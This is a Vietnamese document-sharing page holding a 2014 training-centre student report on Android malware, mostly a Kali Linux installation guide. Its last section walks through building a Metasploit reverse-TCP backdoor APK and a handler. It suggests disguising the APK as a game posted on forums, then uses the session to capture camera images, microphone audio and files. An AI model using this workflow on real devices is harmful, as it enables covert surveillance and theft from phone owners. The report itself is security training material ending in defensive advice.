Chương III (Nội dung vẽ sơ đồ tư duy chương 3)Chương III (Nội dung vẽ sơ đồ tư duy chương 3)
Chương III (Nội dung vẽ sơ đồ tư duy chương 3)
duykhoacao
 
30 - ĐỀ THI HSG - HÓA HỌC 9 - NĂM HỌC 2021 - 2022.pdf
30 - ĐỀ THI HSG - HÓA HỌC 9 - NĂM HỌC 2021 - 2022.pdf30 - ĐỀ THI HSG - HÓA HỌC 9 - NĂM HỌC 2021 - 2022.pdf
30 - ĐỀ THI HSG - HÓA HỌC 9 - NĂM HỌC 2021 - 2022.pdf
ngocnguyensp1
 
Khoá luận tốt nghiệp ngành Truyền thông đa phương tiện Xây dựng kế hoạch truy...
Khoá luận tốt nghiệp ngành Truyền thông đa phương tiện Xây dựng kế hoạch truy...Khoá luận tốt nghiệp ngành Truyền thông đa phương tiện Xây dựng kế hoạch truy...
Khoá luận tốt nghiệp ngành Truyền thông đa phương tiện Xây dựng kế hoạch truy...
https://www.facebook.com/garmentspace
 
98 BÀI LUYỆN NGHE TUYỂN SINH VÀO LỚP 10 TIẾNG ANH DẠNG TRẮC NGHIỆM 4 CÂU TRẢ ...
98 BÀI LUYỆN NGHE TUYỂN SINH VÀO LỚP 10 TIẾNG ANH DẠNG TRẮC NGHIỆM 4 CÂU TRẢ ...98 BÀI LUYỆN NGHE TUYỂN SINH VÀO LỚP 10 TIẾNG ANH DẠNG TRẮC NGHIỆM 4 CÂU TRẢ ...
98 BÀI LUYỆN NGHE TUYỂN SINH VÀO LỚP 10 TIẾNG ANH DẠNG TRẮC NGHIỆM 4 CÂU TRẢ ...
Nguyen Thanh Tu Collection
 
AV6 - PIE CHART WRITING skill in english
AV6 - PIE CHART WRITING skill in englishAV6 - PIE CHART WRITING skill in english
AV6 - PIE CHART WRITING skill in english
Qucbo964093
 
CHUYÊN ĐỀ BỒI DƯỠNG HỌC SINH GIỎI KHOA HỌC TỰ NHIÊN 9 CHƯƠNG TRÌNH MỚI - PHẦN...
CHUYÊN ĐỀ BỒI DƯỠNG HỌC SINH GIỎI KHOA HỌC TỰ NHIÊN 9 CHƯƠNG TRÌNH MỚI - PHẦN...CHUYÊN ĐỀ BỒI DƯỠNG HỌC SINH GIỎI KHOA HỌC TỰ NHIÊN 9 CHƯƠNG TRÌNH MỚI - PHẦN...
CHUYÊN ĐỀ BỒI DƯỠNG HỌC SINH GIỎI KHOA HỌC TỰ NHIÊN 9 CHƯƠNG TRÌNH MỚI - PHẦN...
Nguyen Thanh Tu Collection
 
BAI TAP ON HE LOP 2 LEN 3 MON TIENG VIET.pdf
BAI TAP ON HE LOP 2 LEN 3 MON TIENG VIET.pdfBAI TAP ON HE LOP 2 LEN 3 MON TIENG VIET.pdf
BAI TAP ON HE LOP 2 LEN 3 MON TIENG VIET.pdf
phamthuhoai20102005
 
GIÁO TRÌNH 2-TÀI LIỆU SỬA CHỮA BOARD MONO TỦ LẠNH MÁY GIẶT ĐIỀU HÒA.pdf
GIÁO TRÌNH 2-TÀI LIỆU SỬA CHỮA BOARD MONO TỦ LẠNH MÁY GIẶT ĐIỀU HÒA.pdfGIÁO TRÌNH 2-TÀI LIỆU SỬA CHỮA BOARD MONO TỦ LẠNH MÁY GIẶT ĐIỀU HÒA.pdf
GIÁO TRÌNH 2-TÀI LIỆU SỬA CHỮA BOARD MONO TỦ LẠNH MÁY GIẶT ĐIỀU HÒA.pdf
Điện Lạnh Bách Khoa Hà Nội
 

Recently uploaded (10)

Ảnh hưởng của nhân sinh quan Phật giáo đến đời sống tinh thần Việt Nam hiện nay
Ảnh hưởng của nhân sinh quan Phật giáo đến đời sống tinh thần Việt Nam hiện nayẢnh hưởng của nhân sinh quan Phật giáo đến đời sống tinh thần Việt Nam hiện nay
Ảnh hưởng của nhân sinh quan Phật giáo đến đời sống tinh thần Việt Nam hiện nay
 
Dẫn luận ngôn ngữ - Tu vung ngu nghia.pptx
Dẫn luận ngôn ngữ - Tu vung ngu nghia.pptxDẫn luận ngôn ngữ - Tu vung ngu nghia.pptx
Dẫn luận ngôn ngữ - Tu vung ngu nghia.pptx
 
Chương III (Nội dung vẽ sơ đồ tư duy chương 3)
Chương III (Nội dung vẽ sơ đồ tư duy chương 3)Chương III (Nội dung vẽ sơ đồ tư duy chương 3)
Chương III (Nội dung vẽ sơ đồ tư duy chương 3)
 
30 - ĐỀ THI HSG - HÓA HỌC 9 - NĂM HỌC 2021 - 2022.pdf
30 - ĐỀ THI HSG - HÓA HỌC 9 - NĂM HỌC 2021 - 2022.pdf30 - ĐỀ THI HSG - HÓA HỌC 9 - NĂM HỌC 2021 - 2022.pdf
30 - ĐỀ THI HSG - HÓA HỌC 9 - NĂM HỌC 2021 - 2022.pdf
 
Khoá luận tốt nghiệp ngành Truyền thông đa phương tiện Xây dựng kế hoạch truy...
Khoá luận tốt nghiệp ngành Truyền thông đa phương tiện Xây dựng kế hoạch truy...Khoá luận tốt nghiệp ngành Truyền thông đa phương tiện Xây dựng kế hoạch truy...
Khoá luận tốt nghiệp ngành Truyền thông đa phương tiện Xây dựng kế hoạch truy...
 
98 BÀI LUYỆN NGHE TUYỂN SINH VÀO LỚP 10 TIẾNG ANH DẠNG TRẮC NGHIỆM 4 CÂU TRẢ ...
98 BÀI LUYỆN NGHE TUYỂN SINH VÀO LỚP 10 TIẾNG ANH DẠNG TRẮC NGHIỆM 4 CÂU TRẢ ...98 BÀI LUYỆN NGHE TUYỂN SINH VÀO LỚP 10 TIẾNG ANH DẠNG TRẮC NGHIỆM 4 CÂU TRẢ ...
98 BÀI LUYỆN NGHE TUYỂN SINH VÀO LỚP 10 TIẾNG ANH DẠNG TRẮC NGHIỆM 4 CÂU TRẢ ...
 
AV6 - PIE CHART WRITING skill in english
AV6 - PIE CHART WRITING skill in englishAV6 - PIE CHART WRITING skill in english
AV6 - PIE CHART WRITING skill in english
 
CHUYÊN ĐỀ BỒI DƯỠNG HỌC SINH GIỎI KHOA HỌC TỰ NHIÊN 9 CHƯƠNG TRÌNH MỚI - PHẦN...
CHUYÊN ĐỀ BỒI DƯỠNG HỌC SINH GIỎI KHOA HỌC TỰ NHIÊN 9 CHƯƠNG TRÌNH MỚI - PHẦN...CHUYÊN ĐỀ BỒI DƯỠNG HỌC SINH GIỎI KHOA HỌC TỰ NHIÊN 9 CHƯƠNG TRÌNH MỚI - PHẦN...
CHUYÊN ĐỀ BỒI DƯỠNG HỌC SINH GIỎI KHOA HỌC TỰ NHIÊN 9 CHƯƠNG TRÌNH MỚI - PHẦN...
 
BAI TAP ON HE LOP 2 LEN 3 MON TIENG VIET.pdf
BAI TAP ON HE LOP 2 LEN 3 MON TIENG VIET.pdfBAI TAP ON HE LOP 2 LEN 3 MON TIENG VIET.pdf
BAI TAP ON HE LOP 2 LEN 3 MON TIENG VIET.pdf
 
GIÁO TRÌNH 2-TÀI LIỆU SỬA CHỮA BOARD MONO TỦ LẠNH MÁY GIẶT ĐIỀU HÒA.pdf
GIÁO TRÌNH 2-TÀI LIỆU SỬA CHỮA BOARD MONO TỦ LẠNH MÁY GIẶT ĐIỀU HÒA.pdfGIÁO TRÌNH 2-TÀI LIỆU SỬA CHỮA BOARD MONO TỦ LẠNH MÁY GIẶT ĐIỀU HÒA.pdf
GIÁO TRÌNH 2-TÀI LIỆU SỬA CHỮA BOARD MONO TỦ LẠNH MÁY GIẶT ĐIỀU HÒA.pdf
 

Bao cao athena 2

  • 1. TRUNG TÂM ĐÀO TẠO QUẢN TRỊ MẠNG VÀ AN NINH MẠNG QUỐC TẾ ATHENA BÁO CÁO TUẦN ĐỀ TÀI: NGHIÊN CỨU CÁC TROJAN, MALWARE CHO PHÉP ĐÁNH CẮP DỮ LIỆU NHƯ DANH SÁCH CONTACT, TIN NHẮN TRÊN ĐIỆN THOẠI SỬ DỤNG ANDROID VÀ GỬI RA NGOÀI CBHD: Võ Đỗ Thắng SVTH: Nguyễn Đức Thái Tp. HCM Ngày 29 Tháng 06 Năm 2014
  • 2. Mục Lục Nội dung: Nghiên cứu Kali Linux, Sử dụng Kali Linux để tấn công vào Android......................... 1 1. Nghiên cứu Kali Linux, các cơ chế tạo mã độc trên Kali Linux để xâm nhập vào máy Android .................................................................................................................................................. 1 1.1. Tổng quan .............................................................................................................................. 1 1.2. Cải tiến của Kali Linux so với Backtrack. .......................................................................... 1 1.3. Cài đặt Kali Linux................................................................................................................. 2 1.3.1. Chuẩn bị......................................................................................................................... 2 1.3.2. Cài đặt. ........................................................................................................................... 2 1.4. Tạo mã độc trên Kali Linux để xâm nhập Android......................................................... 15
  • 3. CBHD: VÕ ĐỖ THẮNG SVTH: NGUYỄN ĐỨC THÁI Trang 1 Nội dung: Nghiên cứu Kali Linux, Sử dụng Kali Linux để tấn công vào Android. 1. Nghiên cứu Kali Linux, các cơ chế tạo mã độc trên Kali Linux để xâm nhập vào máy Android 1.1. Tổng quan Kali Linux là một hệ điều hành được xây dựng trên nhân Linux, được thiết kế để kiểm tra bảo mật, thử nghiệm xâm nhập các hệ thống máy tính. Tiền thân của Kali Linux là BackTrack, xuất hiện năm 2006 và được các chuyên gia đánh giá bảo mật ưa chuộng sử dụng. Sau 7 năm liên tục phát triển, tháng 3 năm 2013, hãng Offensive Security đã công bố phiên bản mới của BackTrack có thên là Kali Linux (được xem như phiên bản BackTrack 6). Kali Linux tập hợp và phân loại gần như tất cả các công cụ thiết yếu mà bất kì chuyên gia đánh giá bảo mật nào cũng cần sử dụng khi tác nghiệp. 1.2. Cải tiến của Kali Linux so với Backtrack.  Kali phát triển trên nền tảng hệ điều hành Debian Điều này có nghĩa Kali có rất nhiều ưu điểm. Đầu tiên là các Repository (Kho lưu trữ phần mềm) được đồng bộ hóa với các Repository của Debian nên có thể dễ dàng có được các bản cập nhật vá lỗi bảo mật mới nhất và các cập nhật Repository. Duy trì cập nhật (up-to-date) đối với các công cụ Penetration Test là một yêu cầu vô cùng quan trọng. Một lợi thế khác là mọi công cụ trong Kali đều tuân theo chính sách quản lý gói của Debian. Điều này có vẻ không quan trọng nhưng nó đảm bảo rõ ràng về mặt cấu trúc hệ thống tổng thể, nó cũng giúp cho chúng ta có thể dễ dàng hơn trong việc xem xét hoặc thay đổi mã nguồn của các công cụ.  Tính tương thích kiến trúc Một ưu điểm quan trọng trong Kali là nó đã cải tiến khả năng tương thích với kiến trúc ARM. Từ khi Kali xuất hiện, nhiều phiên bản ấn tượng đã được tạo ra. Giờ đây ta có thể build Kali trên một Raspberry Pi hoặc trên Samsung Galaxy Note.  Hỗ trợ mạng không dây tốt hơn Một trong những vấn đề được các nhà phát triển Kali chú trọng nhiều nhất, chính là sự hỗ trợ cho một số lượng lớn phần cứng bên trong các thiết bị mạng không dây hay USB Dongles. Một yêu cầu quan trọng khi các chuyên gia bảo mật thực hiện đánh giá mạng không dây.  Khả năng tùy biến cao
  • 4. CBHD: VÕ ĐỖ THẮNG SVTH: NGUYỄN ĐỨC THÁI Trang 2 Kali rất linh hoạt khi đề cập đến giao diện hoặc khả năng tuỳ biến hệ thống. Đối với giao diện, giờ đây người dùng đã có thể chọn cho mình nhiều loại Desktops như GNOME, KDE hoặc XFCE tùy theo sở thích và thói quen sử dụng.  Dễ dàng nâng cấp giữa các phiên bản Kali trong tương lai Đối với bất cứ ai sử dụng Kali, đây là một tính năng quan trọng khi bảo trì hệ điều hành Kali. Với BackTrack, bất kỳ lúc nào khi phiên bản mới được công bố thì chúng ta đều phải cài lại mới hoàn toàn (Ngoại trừ phiên bản R2 lên R3). Giờ đây với Kali, nhờ vào sự chuyển đổi sang nền tảng hệ điều hành Debian, Kali đã dễ dàng hơn trong việc âng cấp hệ thống khi phiên bản mới xuất hiện, người dùng không phải cài lại mới hoàn toàn nữa 1.3. Cài đặt Kali Linux 1.3.1. Chuẩn bị.  File iso Kali Linux: http://www.kali.org/downloads/  Máy có cài sẵn Vmware. 1.3.2. Cài đặt. Đầu tiên ta cần download Kali Linux tại link sau http://www.kali.org/downloads/. Chọn phiên bản phù hợp tiến hành download. Ở đây chọn phiên bản dành cho windowns 32 bit download bằng link trực tiếp. Sau khi có file iso ta tiến hành cài đặt Kali Linux trên máy ảo. Khởi động VMwarre, ở góc phải trên màn hình chọn File -> New Virtual Machine....
  • 5. CBHD: VÕ ĐỖ THẮNG SVTH: NGUYỄN ĐỨC THÁI Trang 3 Hình 12. Chon phương thức cái đặt. Chọn Typical, nhấn Next để tiếp tục. Hình 33. Tìm đường dẫn đến file iso Kali Linux. Chọn Installer disc image file, nhấn Browse… tìm đường dẫn đến file iso của Kali Linux sau đó nhấn Next để tiếp tục.
  • 6. CBHD: VÕ ĐỖ THẮNG SVTH: NGUYỄN ĐỨC THÁI Trang 4 Hình 34. Chọn dung lượng đĩa. Thiết đặt dung lượng tối đa dùng để cài đặt Kali Linux sau đó chọn Next. Hình 35. Xác nhận cài Đặt. Chọn Finish để xác nhận tiến hành cài đặt.
  • 7. CBHD: VÕ ĐỖ THẮNG SVTH: NGUYỄN ĐỨC THÁI Trang 5 Hình 36. Cài đặt Kali Linux. Tại đây ta chọn Graphical install => Enter để tiến hành cài đặt trực quan bằng giao diện. Hình 37. Chọn Ngôn Ngữ. Tiến hành chọn lựa ngôn ngữ (ở đây chọn English), nhấn continue.
  • 8. CBHD: VÕ ĐỖ THẮNG SVTH: NGUYỄN ĐỨC THÁI Trang 6 Hình 38. Chọn khu vực. Lựa chọn khu vực ta chọn other => Continue. Hình 39. Khu vực Asia. Tiếp tục chọn khu vực là Asia => Continue.
  • 9. CBHD: VÕ ĐỖ THẮNG SVTH: NGUYỄN ĐỨC THÁI Trang 7 Hình 20. Chọn quốc gia Viet Nam. Chọn quốc gia là Viet Nam => Continue. Hình 41. Chọn bảng mã. Chọn bảng mã là United States – en_US.UTF. Bảng mã này gồm đầy đủ các ký tự Latinh đồng thời hỗ trợ Tiếng Việt. Nhấn Continue để tiếp tục.
  • 10. CBHD: VÕ ĐỖ THẮNG SVTH: NGUYỄN ĐỨC THÁI Trang 8 Hình 42. Chọn kiểu bàn phím. Chọn kiểu bàn phím Ameican English => Continue. Hình 43. Đặt Hostname. Tiếp theo là thiết đặt mạng. Đặt tên Hostname là bắt buộc. Ta có thể đặt tên bất kỳ nhưng không thể có khoảng trắng. Nhấn Continue để tiếp tục.
  • 11. CBHD: VÕ ĐỖ THẮNG SVTH: NGUYỄN ĐỨC THÁI Trang 9 Hình 44. Đặt Domain name. Có thể bỏ trống Domain name => Continue. Hình 43. Đặt root password. Điền hai lần Root password giống nhau (nhớ password đã đặt để sau này đăng nhập) => Continue.
  • 12. CBHD: VÕ ĐỖ THẮNG SVTH: NGUYỄN ĐỨC THÁI Trang 10 Hình 44. Tùy chọn ổ đĩa. Tùy chọn ổ đĩa cài đặt. Ở đây ta chọn use entire disk -> continue. Hình 45. Chọn ổ đĩa cài đặt. Tiếp tục nhấn Continue.
  • 13. CBHD: VÕ ĐỖ THẮNG SVTH: NGUYỄN ĐỨC THÁI Trang 11 Hình 46. Phương thức cài đặt ổ đĩa. Chọn All file in one partion => Continue. Hình 47. Xác nhận thông số cài đặt. Kiểm tra thiết đặt thông tin ổ đĩa. Nếu có sai sót chọn Go Back để sửa đổi. Chọn Continue tiếp tục.
  • 14. CBHD: VÕ ĐỖ THẮNG SVTH: NGUYỄN ĐỨC THÁI Trang 12 Hình 50. Xác nhận định dạng ổ đĩa. Chọn Yes để xác nhận thay đổi ổ đĩa => Continue để tiến trình bắt đầu copy file và cài đặt Kali Linux. Hình 51. Cài đặt bắt đầu.
  • 15. CBHD: VÕ ĐỖ THẮNG SVTH: NGUYỄN ĐỨC THÁI Trang 13 Hình 52. Tìm kiếm cập nhật qua internet. Ở đây nếu chọn Yes tiến trình sẽ kiểm tra có hay không bản cập nhật qua mạng. Ta chọn No để nhanh chóng cài đặt (có thể cập nhật sau khi cài đặt xong). Hình 53. Xác nhận cài đặt GRUD.
  • 16. CBHD: VÕ ĐỖ THẮNG SVTH: NGUYỄN ĐỨC THÁI Trang 14 Tiếp theo tiến trình sẽ hỏi có cài đặt và sử dụng GRUB để khởi động không. Ta chọn Yes => Continue. Hình 54. Xác nhận cài đặt thành công. Thông báo xác nhận Kali Linux Đã cài đặt xong. Ta chọn Continue tiến trình sẽ thực hiện xoa một số file dư thừa sau khi cài đặt rồi khởi động lại.
  • 17. CBHD: VÕ ĐỖ THẮNG SVTH: NGUYỄN ĐỨC THÁI Trang 15 Hình 55. Đăng nhập Kali Linux. Sau khi khởi động xong ta nhập User là root va password được đặt ở trên để đăng nhập. Như vậy là ta đã hoàn thành cài đặt xong Kali Linux. 1.4. Tạo mã độc trên Kali Linux để xâm nhập Android. Trước khi tiến hành ta nên thiết lập phần Network như sau: Vào VM => Settings... ở thanh lựa chọn của Vmware
  • 18. CBHD: VÕ ĐỖ THẮNG SVTH: NGUYỄN ĐỨC THÁI Trang 16 Vào Network Adapter và chọn Bridged: connection directly to the physical network Vào Edit => Virtual Network Editor... Trên phần Bridge (connect VMs directly to the external network) chọn adapter của máy thật
  • 19. CBHD: VÕ ĐỖ THẮNG SVTH: NGUYỄN ĐỨC THÁI Trang 17 Tiếp theo ta sẽ tiến hành xâm nhập và điều khiển Android bằng Kali Linux. Đầu tiên ta cần tạo 1 file apk có chứa backdoor bằng cách: Đầu tiên mở terminal và gõ dòng lệnh ifconfig để biêt thông tin ip của máy.
  • 20. CBHD: VÕ ĐỖ THẮNG SVTH: NGUYỄN ĐỨC THÁI Trang 18 Sử dụng lệnh msfpayload android/meterpreter/reverse_tcp lhost=192.168.240.132 lport=4444 R > /root/Desktop/App.apk để tạo backdoor. Với 192.168.240.132 là ip đã tìm được ở trên. Lệnh trên sẽ tạo ra 1 file files.apk trên desktop của Kali, đây chính là một Metasploit reverse tcp backdoor.
  • 21. CBHD: VÕ ĐỖ THẮNG SVTH: NGUYỄN ĐỨC THÁI Trang 19 Tiếp theo, gõ lệnh msfconsole Sau khi msfconsile load xong, ta tạo một handler để xử lí dữ liệu truyền về bằng cách gõ lệnh sau: use exploit/multi/handler set payload /meterpreter/reverse_tcp set lhost 192.168.240.132 – nhập địa chỉ IP giống với khi tạo payload ở trên. set port 4444 – nhập port giống với port khi tạo payload ở trên. exploit Màn hình sẽ như sau, lúc này ta đang chờ một máy android mở backdoor. Đến đây, vấn đề của chúng ta là làm sao để phân tán file chứa backdoor App.apk đến các máy Android. Ta có thể ngụy trang file App.apk thành một ứng dụng, game va tiến hành chia sẻ trên forum. Ở đây thử với một máy Galaxy Nexus One giả lập, tải về App.apk, cài đặt:
  • 22. CBHD: VÕ ĐỖ THẮNG SVTH: NGUYỄN ĐỨC THÁI Trang 20 Khởi động ứng dụng vậy là ta đã kết nối thành công tới máy Android này, ở msfconsole sẽ như sau: Để xem tất cả các lệnh hỗ trợ nhập help
  • 23. CBHD: VÕ ĐỖ THẮNG SVTH: NGUYỄN ĐỨC THÁI Trang 21 Để xem thông tin về máy, nhập lệnh SysInfo Xem thông tin card mạng nhập lệnh ipconfig: Sử dụng camera: Để xem danh sách camera, nhập webcam_list Để chụp hình bằng camera, nhập webcam_snap x với x là id của camera xem ở danh sách camera ở phần trước. Ví dụ như sau:
  • 24. CBHD: VÕ ĐỖ THẮNG SVTH: NGUYỄN ĐỨC THÁI Trang 22 File hình đã chụp từ camera của máy android là RbWBRryj.jpeg được lưu ở /root của máy Ghi âm Để thực hiện ghi âm, nhập lênh record_mic và file ghi âm sẽ được lưu về máy Ta được file ghi âm Lấy file từ sd card Để vào sdcard, nhập lệnh : cd /sdcard và lệnh ls để xem danh sách file, thư mục
  • 25. CBHD: VÕ ĐỖ THẮNG SVTH: NGUYỄN ĐỨC THÁI Trang 23 Ví dụ ở đây, ta tải file App.apk trong thư mục sdcard.dùng lệnh download App.apk Và file này sẽ được tải về thư mục root của máy Kali Nhập lệnh shell để điều khiển máy trong chế độ shell. Tai đây ta nhập lệnh ls –l để xem các file và quyền hạn cần để sử dụng.
  • 26. CBHD: VÕ ĐỖ THẮNG SVTH: NGUYỄN ĐỨC THÁI Trang 24 Như các bạn cũng thấy thư muc data cần quyền hạn cao nhất để tiến hành sử dụng. Mà các dữ liệu quan trọng như Contacts, SMS, tài khoản đồng bộ Google… đều được lưu tại đây. Vi thế ta chỉ có thể lấy cắp các thông tin này nếu như máy Android bị xâm nhập đã được root (hack chiếm quyền điều khiển cao nhất). Kết luận Như vậy, ta đã tìm hiểu về Kali Linux, các cải tiến của nó so với BackTrack. Cách sử dụng Metasploit của Kali Linux để xâm nhập và điều khiển, truyền dữ liệu từ máy Android về máy. Sau khi thử nghiệm cách tấn công này, ta rút ra không nên tải về và chạy file lạ trên máy android để bảo đảm không cài nhầm backdoor như đã thấy ở trên, không tiến hành root may nếu không thực sự cần thiết vì chỉ cần máy bị nhiễm backdoor là ta đã có thể xem như có toàn quyền kiểm soát máy Android đó.